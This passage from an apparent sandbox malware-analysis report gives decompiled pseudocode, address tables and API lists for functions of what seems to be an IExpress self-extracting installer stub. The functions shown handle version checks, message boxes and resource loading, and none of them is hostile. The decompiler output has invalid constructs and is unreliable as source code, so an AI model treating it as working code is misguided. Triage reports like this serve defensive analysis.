                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                        • String ID: wininit.ini
                                                                        • API String ID: 3273605193-4206010578
                                                                        • Opcode ID: 5fbf4047e80699490230568194738777ea5a8a082929047be9f28f9c149ae1ea
                                                                        • Instruction ID: 623d41ea979d1a01055dbf86f95c9a2fde7c27e3036437a2d6d67afb8ae0e3aa
                                                                        • Opcode Fuzzy Hash: 5fbf4047e80699490230568194738777ea5a8a082929047be9f28f9c149ae1ea
                                                                        • Instruction Fuzzy Hash: 3E01B5326011186BC7229B65FD0DEDFBB7DDB46750F000156FA49D3290DE748E45CAA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E003D36EE(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				struct _OSVERSIONINFOA _v416;
                                                                        				signed int _v420;
                                                                        				signed int _v424;
                                                                        				CHAR* _v428;
                                                                        				CHAR* _v432;
                                                                        				signed int _v436;
                                                                        				CHAR* _v440;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t72;
                                                                        				CHAR* _t77;
                                                                        				CHAR* _t91;
                                                                        				CHAR* _t94;
                                                                        				int _t97;
                                                                        				CHAR* _t98;
                                                                        				signed char _t99;
                                                                        				CHAR* _t104;
                                                                        				signed short _t107;
                                                                        				signed int _t109;
                                                                        				short _t113;
                                                                        				void* _t114;
                                                                        				signed char _t115;
                                                                        				short _t119;
                                                                        				CHAR* _t123;
                                                                        				CHAR* _t124;
                                                                        				CHAR* _t129;
                                                                        				signed int _t131;
                                                                        				signed int _t132;
                                                                        				CHAR* _t135;
                                                                        				CHAR* _t138;
                                                                        				signed int _t139;
                                                                        
                                                                        				_t72 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t72 ^ _t139;
                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                        				_t115 = __ecx;
                                                                        				_t135 = 0;
                                                                        				_v432 = __ecx;
                                                                        				_t138 = 0;
                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                        					_t133 = _v416.dwMajorVersion;
                                                                        					_t119 = 2;
                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t119 = 0;
                                                                        						__eflags = 1;
                                                                        						 *0x3d8184 = 1;
                                                                        						 *0x3d8180 = 1;
                                                                        						L13:
                                                                        						 *0x3d9a40 = _t119;
                                                                        						L14:
                                                                        						__eflags =  *0x3d8a34 - _t138; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						__eflags = _t115;
                                                                        						if(_t115 == 0) {
                                                                        							goto L66;
                                                                        						}
                                                                        						_v428 = _t135;
                                                                        						__eflags = _t119;
                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                        						_t11 =  &_v420;
                                                                        						 *_t11 = _v420 & _t138;
                                                                        						__eflags =  *_t11;
                                                                        						_v440 = _t115;
                                                                        						do {
                                                                        							_v424 = _t135 * 0x18;
                                                                        							_v436 = E003D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                        							_t91 = E003D2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                        							_t123 = _v436;
                                                                        							_t133 = 0x54d;
                                                                        							__eflags = _t123;
                                                                        							if(_t123 < 0) {
                                                                        								L32:
                                                                        								__eflags = _v420 - 1;
                                                                        								if(_v420 == 1) {
                                                                        									_t138 = 0x54c;
                                                                        									L36:
                                                                        									__eflags = _t138;
                                                                        									if(_t138 != 0) {
                                                                        										L40:
                                                                        										__eflags = _t138 - _t133;
                                                                        										if(_t138 == _t133) {
                                                                        											L30:
                                                                        											_v420 = _v420 & 0x00000000;
                                                                        											_t115 = 0;
                                                                        											_v436 = _v436 & 0x00000000;
                                                                        											__eflags = _t138 - _t133;
                                                                        											_t133 = _v432;
                                                                        											if(__eflags != 0) {
                                                                        												_t124 = _v440;
                                                                        											} else {
                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                        												_v420 =  &_v268;
                                                                        											}
                                                                        											__eflags = _t124;
                                                                        											if(_t124 == 0) {
                                                                        												_t135 = _v436;
                                                                        											} else {
                                                                        												_t99 = _t124[0x30];
                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                        												__eflags = _t99 & 0x00000001;
                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                        													asm("sbb ebx, ebx");
                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                        												} else {
                                                                        													_t115 = 0x104;
                                                                        												}
                                                                        											}
                                                                        											__eflags =  *0x3d8a38 & 0x00000001;
                                                                        											if(( *0x3d8a38 & 0x00000001) != 0) {
                                                                        												L64:
                                                                        												_push(0);
                                                                        												_push(0x30);
                                                                        												_push(_v420);
                                                                        												_push("lenta");
                                                                        												goto L65;
                                                                        											} else {
                                                                        												__eflags = _t135;
                                                                        												if(_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												__eflags =  *_t135;
                                                                        												if( *_t135 == 0) {
                                                                        													goto L64;
                                                                        												}
                                                                        												MessageBeep(0);
                                                                        												_t94 = E003D681F(_t115);
                                                                        												__eflags = _t94;
                                                                        												if(_t94 == 0) {
                                                                        													L57:
                                                                        													0x180030 = 0x30;
                                                                        													L58:
                                                                        													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                                                                        													__eflags = _t115 & 0x00000004;
                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                        														__eflags = _t115 & 0x00000001;
                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                        															goto L66;
                                                                        														}
                                                                        														__eflags = _t97 - 1;
                                                                        														L62:
                                                                        														if(__eflags == 0) {
                                                                        															_t138 = 0;
                                                                        														}
                                                                        														goto L66;
                                                                        													}
                                                                        													__eflags = _t97 - 6;
                                                                        													goto L62;
                                                                        												}
                                                                        												_t98 = E003D67C9(_t124, _t124);
                                                                        												__eflags = _t98;
                                                                        												if(_t98 == 0) {
                                                                        													goto L57;
                                                                        												}
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags = _t138 - 0x54c;
                                                                        										if(_t138 == 0x54c) {
                                                                        											goto L30;
                                                                        										}
                                                                        										__eflags = _t138;
                                                                        										if(_t138 == 0) {
                                                                        											goto L66;
                                                                        										}
                                                                        										_t135 = 0;
                                                                        										__eflags = 0;
                                                                        										goto L44;
                                                                        									}
                                                                        									L37:
                                                                        									_t129 = _v432;
                                                                        									__eflags = _t129[0x7c];
                                                                        									if(_t129[0x7c] == 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t133 =  &_v268;
                                                                        									_t104 = E003D28E8(_t129,  &_v268, _t129,  &_v428);
                                                                        									__eflags = _t104;
                                                                        									if(_t104 != 0) {
                                                                        										goto L66;
                                                                        									}
                                                                        									_t135 = _v428;
                                                                        									_t133 = 0x54d;
                                                                        									_t138 = 0x54d;
                                                                        									goto L40;
                                                                        								}
                                                                        								goto L33;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							if(_t91 > 0) {
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags = _t123;
                                                                        							if(_t123 != 0) {
                                                                        								__eflags = _t91;
                                                                        								if(_t91 != 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                        								L27:
                                                                        								if(__eflags <= 0) {
                                                                        									goto L37;
                                                                        								}
                                                                        								L28:
                                                                        								__eflags = _t135;
                                                                        								if(_t135 == 0) {
                                                                        									goto L33;
                                                                        								}
                                                                        								_t138 = 0x54c;
                                                                        								goto L30;
                                                                        							}
                                                                        							__eflags = _t91;
                                                                        							_t107 = _v416.dwBuildNumber;
                                                                        							if(_t91 != 0) {
                                                                        								_t131 = _v424;
                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                        									goto L37;
                                                                        								}
                                                                        								goto L28;
                                                                        							}
                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                        							_t109 = _v424;
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                        								goto L28;
                                                                        							}
                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                        							goto L27;
                                                                        							L33:
                                                                        							_t135 =  &(_t135[1]);
                                                                        							_v428 = _t135;
                                                                        							_v420 = _t135;
                                                                        							__eflags = _t135 - 2;
                                                                        						} while (_t135 < 2);
                                                                        						goto L36;
                                                                        					}
                                                                        					__eflags = _t77 == 1;
                                                                        					if(_t77 == 1) {
                                                                        						 *0x3d9a40 = _t119;
                                                                        						 *0x3d8184 = 1;
                                                                        						 *0x3d8180 = 1;
                                                                        						__eflags = _t133 - 3;
                                                                        						if(_t133 > 3) {
                                                                        							__eflags = _t133 - 5;
                                                                        							if(_t133 < 5) {
                                                                        								goto L14;
                                                                        							}
                                                                        							_t113 = 3;
                                                                        							_t119 = _t113;
                                                                        							goto L13;
                                                                        						}
                                                                        						_t119 = 1;
                                                                        						_t114 = 3;
                                                                        						 *0x3d9a40 = 1;
                                                                        						__eflags = _t133 - _t114;
                                                                        						if(__eflags < 0) {
                                                                        							L9:
                                                                        							 *0x3d8184 = _t135;
                                                                        							 *0x3d8180 = _t135;
                                                                        							goto L14;
                                                                        						}
                                                                        						if(__eflags != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                        							goto L14;
                                                                        						}
                                                                        						goto L9;
                                                                        					}
                                                                        					_t138 = 0x4ca;
                                                                        					goto L44;
                                                                        				} else {
                                                                        					_t138 = 0x4b4;
                                                                        					L44:
                                                                        					_push(_t135);
                                                                        					_push(0x10);
                                                                        					_push(_t135);
                                                                        					_push(_t135);
                                                                        					L65:
                                                                        					_t133 = _t138;
                                                                        					E003D44B9(0, _t138);
                                                                        					L66:
                                                                        					return E003D6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                        				}
                                                                        			}





































                                                                        0x003d36f9
                                                                        0x003d3700
                                                                        0x003d370c
                                                                        0x003d3716
                                                                        0x003d3718
                                                                        0x003d371b
                                                                        0x003d3721
                                                                        0x003d372b
                                                                        0x003d373d
                                                                        0x003d3745
                                                                        0x003d3746
                                                                        0x003d3746
                                                                        0x003d3749
                                                                        0x003d37ab
                                                                        0x003d37ad
                                                                        0x003d37ae
                                                                        0x003d37b3
                                                                        0x003d37b8
                                                                        0x003d37b8
                                                                        0x003d37bf
                                                                        0x003d37bf
                                                                        0x003d37c5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d37cb
                                                                        0x003d37cd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d37d5
                                                                        0x003d37db
                                                                        0x003d37e8
                                                                        0x003d37ea
                                                                        0x003d37ea
                                                                        0x003d37ea
                                                                        0x003d37f0
                                                                        0x003d37f6
                                                                        0x003d3805
                                                                        0x003d3817
                                                                        0x003d382b
                                                                        0x003d3830
                                                                        0x003d3836
                                                                        0x003d383b
                                                                        0x003d383d
                                                                        0x003d38eb
                                                                        0x003d38eb
                                                                        0x003d38f2
                                                                        0x003d390c
                                                                        0x003d3911
                                                                        0x003d3911
                                                                        0x003d3913
                                                                        0x003d394d
                                                                        0x003d394d
                                                                        0x003d394f
                                                                        0x003d38a9
                                                                        0x003d38a9
                                                                        0x003d38b0
                                                                        0x003d38b2
                                                                        0x003d38b9
                                                                        0x003d38bb
                                                                        0x003d38c1
                                                                        0x003d3975
                                                                        0x003d38c7
                                                                        0x003d38de
                                                                        0x003d38e0
                                                                        0x003d38e0
                                                                        0x003d397b
                                                                        0x003d397d
                                                                        0x003d39a9
                                                                        0x003d397f
                                                                        0x003d3982
                                                                        0x003d398b
                                                                        0x003d398d
                                                                        0x003d398f
                                                                        0x003d399f
                                                                        0x003d39a1
                                                                        0x003d3991
                                                                        0x003d3991
                                                                        0x003d3991
                                                                        0x003d398f
                                                                        0x003d39af
                                                                        0x003d39b6
                                                                        0x003d3a0f
                                                                        0x003d3a0f
                                                                        0x003d3a11
                                                                        0x003d3a13
                                                                        0x003d3a19
                                                                        0x00000000
                                                                        0x003d39b8
                                                                        0x003d39b8
                                                                        0x003d39ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d39bc
                                                                        0x003d39bf
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d39c3
                                                                        0x003d39c9
                                                                        0x003d39ce
                                                                        0x003d39d0
                                                                        0x003d39e3
                                                                        0x003d39e5
                                                                        0x003d39e6
                                                                        0x003d39f1
                                                                        0x003d39f7
                                                                        0x003d39fa
                                                                        0x003d3a01
                                                                        0x003d3a04
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3a06
                                                                        0x003d3a09
                                                                        0x003d3a09
                                                                        0x003d3a0b
                                                                        0x003d3a0b
                                                                        0x00000000
                                                                        0x003d3a09
                                                                        0x003d39fc
                                                                        0x00000000
                                                                        0x003d39fc
                                                                        0x003d39d3
                                                                        0x003d39d8
                                                                        0x003d39da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d39dc
                                                                        0x003d39b6
                                                                        0x003d3955
                                                                        0x003d395b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3961
                                                                        0x003d3963
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3969
                                                                        0x003d3969
                                                                        0x00000000
                                                                        0x003d3969
                                                                        0x003d3915
                                                                        0x003d3915
                                                                        0x003d391b
                                                                        0x003d391f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d392d
                                                                        0x003d3933
                                                                        0x003d3938
                                                                        0x003d393a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3940
                                                                        0x003d3946
                                                                        0x003d394b
                                                                        0x00000000
                                                                        0x003d394b
                                                                        0x00000000
                                                                        0x003d38f2
                                                                        0x003d3843
                                                                        0x003d3845
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d384b
                                                                        0x003d384d
                                                                        0x003d3883
                                                                        0x003d3885
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d389a
                                                                        0x003d389e
                                                                        0x003d389e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d38a0
                                                                        0x003d38a0
                                                                        0x003d38a2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d38a4
                                                                        0x00000000
                                                                        0x003d38a4
                                                                        0x003d384f
                                                                        0x003d3851
                                                                        0x003d3857
                                                                        0x003d386e
                                                                        0x003d3877
                                                                        0x003d387b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3881
                                                                        0x003d3859
                                                                        0x003d385c
                                                                        0x003d3862
                                                                        0x003d3866
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3868
                                                                        0x00000000
                                                                        0x003d38f4
                                                                        0x003d38f4
                                                                        0x003d38f5
                                                                        0x003d38fb
                                                                        0x003d3901
                                                                        0x003d3901
                                                                        0x00000000
                                                                        0x003d390a
                                                                        0x003d374b
                                                                        0x003d374e
                                                                        0x003d375c
                                                                        0x003d3764
                                                                        0x003d3769
                                                                        0x003d376e
                                                                        0x003d3771
                                                                        0x003d379c
                                                                        0x003d379f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d37a3
                                                                        0x003d37a4
                                                                        0x00000000
                                                                        0x003d37a4
                                                                        0x003d3773
                                                                        0x003d3777
                                                                        0x003d3778
                                                                        0x003d377f
                                                                        0x003d3781
                                                                        0x003d378e
                                                                        0x003d378e
                                                                        0x003d3794
                                                                        0x00000000
                                                                        0x003d3794
                                                                        0x003d3783
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d3785
                                                                        0x003d378c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d378c
                                                                        0x003d3750
                                                                        0x00000000
                                                                        0x003d372d
                                                                        0x003d372d
                                                                        0x003d396b
                                                                        0x003d396b
                                                                        0x003d396c
                                                                        0x003d396e
                                                                        0x003d396f
                                                                        0x003d3a1e
                                                                        0x003d3a1e
                                                                        0x003d3a22
                                                                        0x003d3a27
                                                                        0x003d3a3e
                                                                        0x003d3a3e

                                                                        APIs
                                                                        • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 003D3723
                                                                        • MessageBeep.USER32(00000000), ref: 003D39C3
                                                                        • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 003D39F1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Message$BeepVersion
                                                                        • String ID: 3$lenta
                                                                        • API String ID: 2519184315-4216304122
                                                                        • Opcode ID: 8661249794681c17089e7e3c53711821824cea660553771cf7ed45913cc2b07c
                                                                        • Instruction ID: c245330de14f665de6bc14e1c80afcf2108907fe178dc6531a9c451b5d443cdc
                                                                        • Opcode Fuzzy Hash: 8661249794681c17089e7e3c53711821824cea660553771cf7ed45913cc2b07c
                                                                        • Instruction Fuzzy Hash: 7891E4B3B022249BDB378B24EC91BEA77B4EB45304F1600ABD8499B341D7708F84DB42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E003D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, char _a16) {
                                                                        				struct HRSRC__* _t6;
                                                                        				void* _t21;
                                                                        				struct HINSTANCE__* _t23;
                                                                        				int _t24;
                                                                        
                                                                        				_t23 =  *0x3d9a3c; // 0x3d0000
                                                                        				_t6 = FindResourceA(_t23, __edx, 5);
                                                                        				if(_t6 == 0) {
                                                                        					L6:
                                                                        					E003D44B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                        					_t5 =  &_a16; // 0x3d2ee8
                                                                        					_t24 =  *_t5;
                                                                        				} else {
                                                                        					_t21 = LoadResource(_t23, _t6);
                                                                        					if(_t21 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						if(_a12 != 0) {
                                                                        							_push(_a12);
                                                                        						} else {
                                                                        							_push(0);
                                                                        						}
                                                                        						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                        						FreeResource(_t21);
                                                                        						if(_t24 == 0xffffffff) {
                                                                        							goto L6;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t24;
                                                                        			}







                                                                        0x003d651f
                                                                        0x003d652a
                                                                        0x003d6534
                                                                        0x003d656b
                                                                        0x003d6577
                                                                        0x003d657c
                                                                        0x003d657c
                                                                        0x003d6536
                                                                        0x003d653e
                                                                        0x003d6542
                                                                        0x00000000
                                                                        0x003d6544
                                                                        0x003d6547
                                                                        0x003d654c
                                                                        0x003d6549
                                                                        0x003d6549
                                                                        0x003d6549
                                                                        0x003d655e
                                                                        0x003d6560
                                                                        0x003d6569
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x003d6569
                                                                        0x003d6542
                                                                        0x003d6587

                                                                        APIs
                                                                        • FindResourceA.KERNEL32(003D0000,000007D6,00000005), ref: 003D652A
                                                                        • LoadResource.KERNEL32(003D0000,00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 003D6538
                                                                        • DialogBoxIndirectParamA.USER32(003D0000,00000000,00000547,003D19E0,00000000), ref: 003D6557
                                                                        • FreeResource.KERNEL32(00000000,?,?,003D2EE8,00000000,003D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 003D6560
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                        • String ID: .=
                                                                        • API String ID: 1214682469-3076444577
                                                                        • Opcode ID: 1fffb9080120cb46977667a798d3fd2526f1ce1d8a8776ede1238c7dd425f186
                                                                        • Instruction ID: 8084eb097a01040e239560d2dc750dd8d740ad824c2703eb1e22c5c774576ce1
                                                                        • Opcode Fuzzy Hash: 1fffb9080120cb46977667a798d3fd2526f1ce1d8a8776ede1238c7dd425f186
                                                                        • Instruction Fuzzy Hash: 93012673101605BBCB135FA9BC09DBB7B6DEB8A360F010127FE2093250D7719D5086A1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 83%
                                                                        			E003D6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __edi;
                                                                        				signed int _t9;
                                                                        				signed char _t14;
                                                                        				struct HINSTANCE__* _t15;
                                                                        				void* _t18;
                                                                        				CHAR* _t26;
                                                                        				void* _t27;
                                                                        				signed int _t28;
                                                                        
                                                                        				_t27 = __esi;
                                                                        				_t18 = __ebx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t28;
                                                                        				_push(__ecx);
                                                                        				E003D1781( &_v268, 0x104, __ecx, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        				_t26 = "advpack.dll";
                                                                        				E003D658A( &_v268, 0x104, _t26);
                                                                        				_t14 = GetFileAttributesA( &_v268);
                                                                        				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                        					_t15 = LoadLibraryA(_t26);
                                                                        				} else {
                                                                        					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                        				}
                                                                        				return E003D6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                        			}













                                                                        0x003d6495
                                                                        0x003d6495
                                                                        0x003d64a0
                                                                        0x003d64a7
                                                                        0x003d64ab
                                                                        0x003d64bd
                                                                        0x003d64c2
                                                                        0x003d64d3
                                                                        0x003d64df
                                                                        0x003d64e8
                                                                        0x003d6502
                                                                        0x003d64ee
                                                                        0x003d64f9
                                                                        0x003d64f9
                                                                        0x003d6516

                                                                        APIs
                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D64DF
                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D64F9
                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 003D6502
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad$AttributesFile
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                        • API String ID: 438848745-726598030
                                                                        • Opcode ID: 246cc580f5d4ef9154277b431a0e66a37f284814fcf299aaeba911c433db4089
                                                                        • Instruction ID: 945022d7cad2c735eb3cb297e1b167ea5a9be2d6ca83d164a197cc0591248777
                                                                        • Opcode Fuzzy Hash: 246cc580f5d4ef9154277b431a0e66a37f284814fcf299aaeba911c433db4089
                                                                        • Instruction Fuzzy Hash: 5E01D172A00108ABDB12DB64FC4AEEE737DEB51311F500197F595962D0DFB0AECA8A51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 32%
                                                                        			E003D4169(void* __eflags) {
                                                                        				int _t18;
                                                                        				void* _t21;
                                                                        
                                                                        				_t20 = E003D468F("FINISHMSG", 0, 0);
                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                        				if(_t21 != 0) {
                                                                        					if(E003D468F("FINISHMSG", _t21, _t20) != 0) {
                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                        							L7:
                                                                        							return LocalFree(_t21);
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0x40);
                                                                        						_push(0);
                                                                        						_push(_t21);
                                                                        						_t18 = 0x3e9;
                                                                        						L6:
                                                                        						E003D44B9(0, _t18);
                                                                        						goto L7;
                                                                        					}
                                                                        					_push(0);
                                                                        					_push(0x10);
                                                                        					_push(0);
                                                                        					_push(0);
                                                                        					_t18 = 0x4b1;
                                                                        					goto L6;
                                                                        				}
                                                                        				return E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        			}





                                                                        0x003d417d
                                                                        0x003d418f
                                                                        0x003d4193
                                                                        0x003d41b7
                                                                        0x003d41d3
                                                                        0x003d41e6
                                                                        0x00000000
                                                                        0x003d41e7
                                                                        0x003d41d5
                                                                        0x003d41d6
                                                                        0x003d41d8
                                                                        0x003d41d9
                                                                        0x003d41da
                                                                        0x003d41df
                                                                        0x003d41e1
                                                                        0x00000000
                                                                        0x003d41e1
                                                                        0x003d41b9
                                                                        0x003d41ba
                                                                        0x003d41bc
                                                                        0x003d41bd
                                                                        0x003d41be
                                                                        0x00000000
                                                                        0x003d41be
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,003D30B4), ref: 003D4189
                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,003D30B4), ref: 003D41E7
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
